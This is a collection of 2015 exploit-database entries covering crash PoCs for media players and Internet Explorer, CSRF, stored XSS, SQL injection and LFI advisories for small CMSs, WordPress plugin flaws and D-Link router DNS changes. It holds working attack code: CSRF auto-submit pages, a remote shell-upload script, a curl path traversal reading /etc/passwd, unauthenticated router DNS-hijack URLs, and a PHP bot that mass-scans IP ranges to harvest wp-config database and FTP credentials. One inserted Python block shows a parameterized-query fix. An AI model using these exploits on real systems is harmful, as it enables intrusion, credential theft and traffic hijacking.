
# Exploit Title: foobar2000 1.3.8 (.m3u) Local Crash PoC
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/e246984718ab7ab58fa1e0b072ff05a4/foobar2000_v1.3.8.exe
# Version: 1.3.8
# Tested on: Windows XP SP3 KOR

file = "poc.m3u"

data = 'http://' + '\x41' * 200000

fd = open(file, 'w')
fd.write(data)
fd.close()
print ""
print "[*] File successfully created !!"
print "[*] Author : 0neb1n"
print "[*] Mail : barcodecrow(at)gmail(dot)com"
            
#!/usr/bin/python
# Exploit Title: GoldWave 6.1.2 (URL) Local Crash Exploit
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.goldwave.com/
# Software Link: http://goldwave.com/downloads/InstallGoldWave612.exe
# Version: 6.1.2
# Tested on: Windows 8.1 Home KR
# Step 1 : Make poc.txt and copy "http://AAAAAAAA..."
# Step 2 : run GoldWave 6.1.2 -> File -> Open URl -> Paste "http://AAAAAA..."
# step 3 : Boom!!

file = "poc.txt"

data = 'http://' + '\x41' * 200000

fd = open(file, 'w')
fd.write(data)
fd.close()

print ""
print "[*] File successfully created !!"
print "[*] Author : 0neb1n"
print "[*] Mail : barcodecrow(at)gmail(dot)com"
            
# Exploit Title:  CSRF, Persistent XSS & LFI
# Google Dork: intitle: CSRF, Persistent XSS & LFI
# Date: 2015-06-11
# Exploit Author:  John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: kilrizzy.github.io/Nakid-CMS
# Software Link: kilrizzy.github.io/Nakid-CMS
# Version: kilrizzy-Nakid-CMS-f274624
# Tested on: windows 7 on XAMPP
# Category: webapps


Vendor:
================================
http://kilrizzy.github.io/Nakid-CMS/



Product:
================================
kilrizzy-Nakid-CMS-f274624
Nakid CMS is an open source content management system built using PHP and
CodeIgniter.


Setup mode:
==========
Under root dir for Nakid CMS we set to production mode instead of
development in index.php.
e.g. define('ENVIRONMENT', 'production');



Advisory Information:
================================================
CSRF, Persistent XSS &  Auth bypass LFI



Vulnerability Details:
=====================
Multiple CSRF(s) exist:

We have the ability to do the following because no CSRF tokens are present.

1-Change Admin password
2-Add arbitrary users to system
3-Alter system settings



XSS (persistent):
Persistent XSS exists in the parameters listed below; payloads are stored
in the MySQL database and executed when a victim visits the vulnerable
webpage.


XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
On the "Edit Record" pop up dialog box.


Vulnerable parameters:
---------------------
username
password
email
fname
lname


XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
On the "Edit Record" pop up dialog box.


Vulnerable parameters:
---------------------
from_name
include_path
primary_email
from_email


XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1

Vulnerable parameter:
--------------------
title


Authentication bypass LFI:
A local file inclusion that bypasses access controls and reads arbitrary
files exists via the '$url' PHP variable on the following URL:

index.php/connector$url



Exploit POC code(s):
====================

CSRF(s):
========

Condition:
Persuade the victim to visit our webpage or click our link; if they have
an active session, the CSRF request goes through.


1- Add arbitrary user to system
--------------------------------

<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users"
method="post">
<input type="text" name="username" value="sum1" />
<input type="text" name="password" value="abc123" />
<input type="text" name="email" value="X@X.com"/>
<input type="text" name="fname" value="sum"/>
<input type="text" name="lname" value="1"/>
<input type="text" name="oper" value="add"/>
<input type="text" name="id" value="_empty"/>
</form>
</body>
</html>


2-Change Admin password
------------------------

<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile"
method="post">
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="xyz123" />
<input type="text" name="email" value="hell@abyss.com"/>
<input type="text" name="fname" value="hyp3r"/>
<input type="text" name="lname" value="linx"/>
<input type="text" name="action" value="edit_profile"/>
<input type="text" name="submitbt" value="Save"/>
</form>
</body>
</html>


3-Alter system settings
-----------------------

<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings"
method="post">
<input type="text" name="value" value="HELL@ABYSS.com" />
<input type="text" name="oper" value="edit" />
<input type="text" name="id" value="1"/>
</form>
</body>
</html>


XSS persistent POC code:
=======================

Inject <script>alert(666)</script> into any of the vulnerable fields
described above using the POST method.
Highlight a row, then click the edit dialog box to edit the settings.

e.g.

http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings

from_name     <------- <script>alert(666)</script>
include_path
primary_email
from_email


Authorization bypass LFI:
========================

1- Log out, create a hell.txt file (or any test file) and put it in 'htdocs'
or the web root, then visit the URL (change to suit your environment).

2-
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt

OR try

http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php




Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 11, 2015 : Public Disclosure




Severity Level:
=========================================================
High



Description:
==========================================================

Request Method(s):         [+] GET & POST


Vulnerable Product:        [+] kilrizzy-Nakid-CMS-f274624


Vulnerable Parameter(s):   [+]
                              username
                              password
                              email
                              fname
                              lname
                              from_name
                              include_path
                              primary_email
                              from_email
                              title
                              connector$url


Affected Area(s):          [+] /system/users
                               /system/profile
                               /system/content_edit/

===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.


(hyp3rlinx)
            
# Exploit title: Opsview 4.6.2 - Multiple XSS
# Date: 07-06-2015
# Vendor homepage: www.opsview.com
# Version: 4.6.2
# CVE: CVE-2015-4420
# Author: Dolev Farhi @dolevf
# Tested On: Kali Linux + Windows 7

# Details:
# --------
# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version



1. Stored XSS through a malicious check plugin

a. Create a plugin with the following content:

#!/bin/bash
echo '<script>alert("script0t0s")</script>'
exit 2

b. Create a new check and assign this plugin.

c. Once a host uses this check, navigate to the event page; the XSS will be injected.

d. Once a user/admin acknowledges this critical event (exit 2), the code executes before their acknowledgement.



2. Stored XSS in host profile

a. add a host

b. In the description of the host, add a description like the one below:
<script>alert(document.cookie)</script>

c. save settings

d. once a user/admin views the host settings, XSS will be injected.


3. Reflected XSS in Test service check page.
a. Add a new service check

b. Test the new service check against any host and supply the following in the command-line field: <script>alert("test")</script>

c. The XSS is immediately reflected to the screen.

Captured request:

POST /state/service/166/exec HTTP/1.1
Host: 192.168.0.20
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
Content-Length: 105
Cookie: PHPSESSID=
auth_tkt=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915
            
# Exploit Title:  SQL Injection & Persistent XSS
# Google Dork: intitle: SQL Injection & Persistent XSS
# Date: 2015-06-12
# Exploit Author:  John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: zencherry.com
# Software Link: sourceforge.net/projects/zencherrycms
# Version: 1.1
# Tested on: windows 7 on Apache Tomcat
# Category: webapps


Vendor:
=============================================
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms



Product:
==================================================
ZCMS 1.1 JavaServer Pages Content Management System



Advisory Information:
==============================
SQL Injection & Persistent XSS



Vulnerability Details:
======================
SQL Injection (CVE-2015-7346):
Login to the admin area requires a password, but it is easily bypassed
using classic SQL injection because the application builds SQL queries
by concatenating user input.


ZCMS exploitable admin login code:
==================================
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users WHERE
status = 0 AND username = '"+username+"' AND password = '"+request.getParameter("pass")+"' AND type = 1 ;";


So we just supply an admin password like --->  HELL' OR '2'='2
which makes the WHERE clause evaluate to true!
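To show why the concatenated query above is bypassable and what the fix looks like, here is an added example (not ZCMS code) that runs the advisory's query shape against an in-memory SQLite table: login_vulnerable() mirrors the concatenation, login_safe() binds the same values as parameters. The table prefix and the sample admin row are constructed for the demo.

```python
import sqlite3

# Constructed for this demo: stands in for ZCMS's TABLE_PREFIX setting.
TABLE_PREFIX = "zc_"


def build_db():
    """Create an in-memory users table with one active admin (constructed sample row)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        f"CREATE TABLE {TABLE_PREFIX}users "
        "(username TEXT, password TEXT, status INTEGER, type INTEGER)"
    )
    # status = 0 and type = 1 are the values the advisory's query looks for.
    con.execute(
        f"INSERT INTO {TABLE_PREFIX}users VALUES ('admin', 'correct-horse', 0, 1)"
    )
    return con


def login_vulnerable(con, username, password):
    """Mirror the advisory's squerry: request parameters spliced straight into SQL."""
    squerry = (
        "SELECT COUNT(username) AS usercount FROM " + TABLE_PREFIX + "users "
        "WHERE status = 0 AND username = '" + username + "' AND password = '"
        + password + "' AND type = 1 ;"
    )
    # The attacker-controlled quote ends the string literal, so
    #   ... AND password = 'HELL' OR '2'='2' AND type = 1
    # parses as (... AND password = 'HELL') OR ('2'='2' AND type = 1),
    # which is true as soon as any type = 1 row exists.
    return con.execute(squerry).fetchone()[0] > 0


def login_safe(con, username, password):
    """Same query with bound parameters: the quote stays data, never SQL syntax."""
    # The table name comes from configuration, not the request, so formatting
    # it in is acceptable; everything user-controlled goes through placeholders.
    sql = (
        f"SELECT COUNT(username) AS usercount FROM {TABLE_PREFIX}users "
        "WHERE status = 0 AND username = ? AND password = ? AND type = 1"
    )
    # (Real code should compare a password hash; the plaintext column is kept
    # only to mirror the advisory's query.)
    return con.execute(sql, (username, password)).fetchone()[0] > 0


def demo():
    """Run the advisory's payload against both versions; returns (vulnerable, safe)."""
    con = build_db()
    payload = "HELL' OR '2'='2"
    return login_vulnerable(con, "admin", payload), login_safe(con, "admin", payload)


if __name__ == "__main__":
    vuln, safe = demo()
    print("concatenated query bypassed:", vuln)   # True
    print("parameterized query bypassed:", safe)  # False
```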


SQL Inject XSS Payload:
=======================
We can also inject a persistent XSS payload directly into the MySQL database,
subverting all character filtering, by leveraging the existing SQL injection
vulnerabilities.


Persistent XSS (CVE-2015-7347):
===============

Another persistent XSS vector is here in author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]


Exploit code(s):
===============

1) Bypass admin login
---------------------
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for username field
Enter HELL' OR '2'='2 for the pass field


2) Inject XSS using SQL Injection
---------------------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title="<script>alert(1)</script>&content=<script>alert(1)</script>&author=<script>alert(1)</script>SATAN&visibility=1&type=1&comm=0


3) Persistent XSS field
-----------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]
Inject <script>alert(666)</script> in the author input field.



Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 12, 2015 : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================

Request Method(s):         [+] GET & POST


Vulnerable Product:        [+] ZCMS_1.1


Vulnerable Parameter(s):   [+] pass, title, content, author


Affected Area(s):          [+] Admin, CMS


===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.


(hyp3rlinx)
            
Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description: 
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.

Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for Wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path; it only checks whether the path contains /wp-content/uploads, which is easily defeated with ../.

This vulnerability doesn’t require authentication to the Wordpress site.

File ./se-html5-album-audio-player/download_audio.php (excerpt starting at line 3 of the file):

$file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
$is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
// make sure it's a file before doing anything!
if( is_file($file_name) && $is_in_uploads_dir !== false ) {

        // required for IE
        if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off');         }

        // get the file mime type using the file extension
        switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
                case 'pdf': $mime = 'application/pdf'; break;
                case 'zip': $mime = 'application/zip'; break;
                case 'jpeg':
                case 'jpg': $mime = 'image/jpg'; break;
                default: $mime = 'application/force-download';
        }
        header('Pragma: public');       // required
        header('Expires: 0');           // no cache
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
        header('Cache-Control: private',false);
        header('Content-Type: '.$mime);
        header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
        header('Content-Transfer-Encoding: binary');
        header('Content-Length: '.filesize($file_name));        // provide file size
        header('Connection: close');
        readfile($file_name);           // push it out
        exit();

The above code does not verify that a user is logged in, nor does it properly check whether the file is outside the uploads directory.

CVEID: 2015-4414
OSVDB:
Exploit Code:
$ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
            
Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php: an unauthenticated user can upload any file to the system, including a .php file. upload.php does not check that the user is authenticated, so a simple POST allows arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:

<?php

$filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
if (file_exists($filename)) {
    include_once($filename);
} else {
    include_once("../../../../wp-load.php");
}
echo "Here";
$image_file = $_FILES['gf_aviary_file'];
if($image_file['name']!=''){
     $max_file_size =  4*1024*1024;
     $file_size = intval($image_file['size']);
     if( $file_size > $max_file_size ){
         $msg = "File Size is too big.";
         $error_flag = true;
     }
     $extension = strtolower(end(explode('.', $image_file['name'])));
     $aa_options = get_option('gf_aa_options');
     $supported_files = $aa_options['supported_file_format'];
     $supported_files = strtolower($supported_files);
     if(!$error_flag && $supported_files != '' ){
       $supported_files = explode (',', $supported_files);
       if(!in_array($extension, $supported_files)){
          $msg = "No Supported file.";
          $error_flag = true;
       }
     }
     if(!$error_flag){
        $wp_upload_dir = wp_upload_dir();
        if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
             mkdir($wp_upload_dir['basedir'].'/gform_aviary');
        }
        $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
        $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
        $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
        if(move_uploaded_file($image_file['tmp_name'], $file_name)){
            $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
        }
    }
    $return_obj = array('status' => 'success', 'message' => $file_url);
    echo json_encode($return_obj);
 }
?>

CVEID: 2015-4455
OSVDB:
Exploit Code:
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/


    $target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
    $file_name_with_full_path = '/var/www/shell.php';

    echo "POST to $target_url $file_name_with_full_path";
    $post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target_url);
    curl_setopt($ch, CURLOPT_POST,1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $result=curl_exec ($ch);
    curl_close ($ch);
    echo "<hr>";
    echo $result;
    echo "<hr>";
?>
            
<!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
        var divA = document.createElement("div");
        document.body.appendChild(divA);

        try {
                //divA.contentEditable = "true";
                divA.outerHTML = "AAAA";
                var context = divA['msGetInputContext']();
        }
        catch (exception) {
        }
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000  test    dword ptr [ecx+8],100000h ds:002b:00000008=????????
-->
            
  D-Link DSL-2730B AU_2.01 
  Authentication Bypass DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

  This security hole allows an attacker to bypass 
  authentication and change the DNS. When the
  administrator is logged in the web  management 
  interface, an attacker may be able to completely 
  bypass authentication phase and connect to the 
  web management interface with administrator's 
  credentials. This attack can also be performed 
  by an external attacker who connects to the 
  router's public IP address, if remote management 
  is enabled. To change the DNS without logging 
  into web management interface use the following URL:
  
http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
            
  D-Link DSL-526B ADSL2+ AU_2.01 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"  
    var dns2 = '8.8.8.8';
            
# Exploit Title: wp-imagezoom Remote Image Upload
# Google Dork: filetype:php inurl:"/wp-content/plugins/wp-imagezoom" & inurl:"?id="
# Date: 06.06.2015
# Exploit Author: T3N38R15
# Software Link: https://downloads.wordpress.org/plugin/wp-imagezoom.1.1.0.zip
# Version: 1.1.0
# Tested on: 	Windows	(Firefox)
		Linux	(Firefox)

The affected file is div_img.php; it allows anybody to upload jpg files.
/wp-content/plugins/wp-imagezoom/div_img.php?src=http://domain.com/img.jpg&cl=100&dl=100
would upload the file to the default directory:
/wp-content/plugins/wp-imagezoom/work/http_cln__sls__sls_domain.com_sls_img.jpg/
The first one is your picture (it is only 469x469, the rest is cut off); the others are zoomed/cut-down versions of it.

It also supports a full path disclosure (FPD):
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=
The variable org_img holds the current location of the work directory.

We can also delete entries with
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=
The following options are available for the cmd parameter:
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delunn
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delone&src=yourwisheddeleted
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delovr&maxsize=size of image

Proof of concept : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=http://static.zerochan.net/Frankenstein.(Noblesse).full.415661.jpg&cl=100&dl=100

Greets to Team Madleets/leets.pro & VIRkid ;)
Regards T3N38R15
            
######################################################################################
# Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability              #
# Date: june 6, 2015                                                                 #
# Exploit Author: ViRuS OS                                                           #
# Google Dork: inurl:?fdx_switcher=mobile                                            #
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/                  #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip  #
# Version:  WP Mobile Edition Version 2.2.7                                          #
# Tested on : windows                                                                #           
###################################################################################### 
Description :
Wordpress Plugin 'WP Mobile Edition' is not filtering data, so we can get the configuration file at the path
< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>

# Exploit Code :
<?php 
//ViRuS OS
set_time_limit(0);
error_reporting(0);
echo "############### Fdx_Switcher MiniBot By ip Range ##################\n\n";
print " Coded By        _                            
          __   _(_)_ __ _   _ ___    ___  ___ 
          \ \ / / | '__| | | / __|  / _ \/ __|
           \ V /| | |  | |_| \__ \ | (_) \__ \
            \_/ |_|_|   \__,_|___/  \___/|___/                                    
Greets >> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH 
";
echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Welcome Master ViRuS OS ################\n\n";
echo "Server Target IP : ";
$ip=trim(fgets(STDIN,1024));
$ip = explode('.',$ip);
$ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
for($i=0;$i <= 255;$i++)
{
$sites = array_map("site", bing("ip:$ip.$i wordpress"));
$un=array_unique($sites);
echo "[+] Scanning -> ", $ip.$i, ""."\n";
echo "Found : ".count($sites)." sites\n\n";
foreach($un as $pok){
$host=findit($file,"DB_HOST', '","');");
$db=findit($file,"DB_NAME', '","');");
$us=findit($file,"DB_USER', '","');");
$pw=findit($file,"DB_PASSWORD', '","');");
$bda="http://$pok";
	$linkof='/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php';
	$dn=($bda).($linkof);
	$file=@file_get_contents($dn);
	if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
	echo "[+] Scanning => ".$bda."\n\n";
	echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
	echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
	echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
	echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
	$db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
	$user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
	$pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
	$host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
	$ux = "".$bda."\r\n";
	$ux1 = "".$db."\r\n";
	$ux2 = "".$user."\r\n";
	$ux3 = "".$pass."\r\n";
	$ux4 = "".$host."\r\n";
	$save=fopen('exploited.txt','ab');
	fwrite($save,"$ux");
	fwrite($save,"$ux1");
	fwrite($save,"$ux2");
	fwrite($save,"$ux3");
	fwrite($save,"$ux4");
	}
	elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
	echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
	echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
	echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
	}
	else{echo $bda." : Exploit failed \n\n";}
}
}
function findit($mytext,$starttag,$endtag) {
 $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
 $posRight = stripos($mytext,$endtag,$posLeft+1);
 return  substr($mytext,$posLeft,$posRight-$posLeft);
}
function site($link){
return str_replace("","",parse_url($link, PHP_URL_HOST));
}
function bing($what){
for($i = 1; $i <= 2000; $i += 10){
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
preg_match_all('#;a=(.*?)" h="#',$data, $links);
foreach($links[1] as $link){
$allLinks[] = $link;
}
if(!preg_match('#"sw_next"#',$data)) break;
}

if(!empty($allLinks) && is_array($allLinks)){
return array_unique(array_map("urldecode", $allLinks));
}
}
?>                                                                                  
            
=========================================================

[+] Title                :-   Pasworld detail.php Blind Sql Injection Vulnerability 
[+] Date                 :-   5  -  June  -  2015
[+] Vendor Homepage:     :-   http://main.pasworld.co.th/
[+] Version              :-   All Versions
[+] Tested on            :-   Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category             :-   webapps
[+] Google Dorks         :-   intext:"Powered By :: PAS World Communitcation" inurl:detail.php 
                              site:go.th inurl:"detail.php?id="
[+] Exploit Author       :-   Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name            :-   Team Alastor Breeze
[+] The official Members :-   Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to            :-   @@lu, Lalit, MyLappy<3, Diksha
[+] Contact              :-   fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com

=========================================================

[+] Severity Level          :- High
[+] Request Method(s)       :- GET / POST
[+] Vulnerable Parameter(s) :- detail.php?id=
[+] Affected Area(s)        :- Entire admin, database, Server

 
=========================================================

[+] About :-  Unauthenticated SQL Injection via "detail.php?id=" parameter
 
[+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php
 
[+] POC    :-  http://127.0.0.1/detail.php?id=[SQL]'

SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs
++++++++++++++++++++++++++

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=152 AND 1414=1414

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
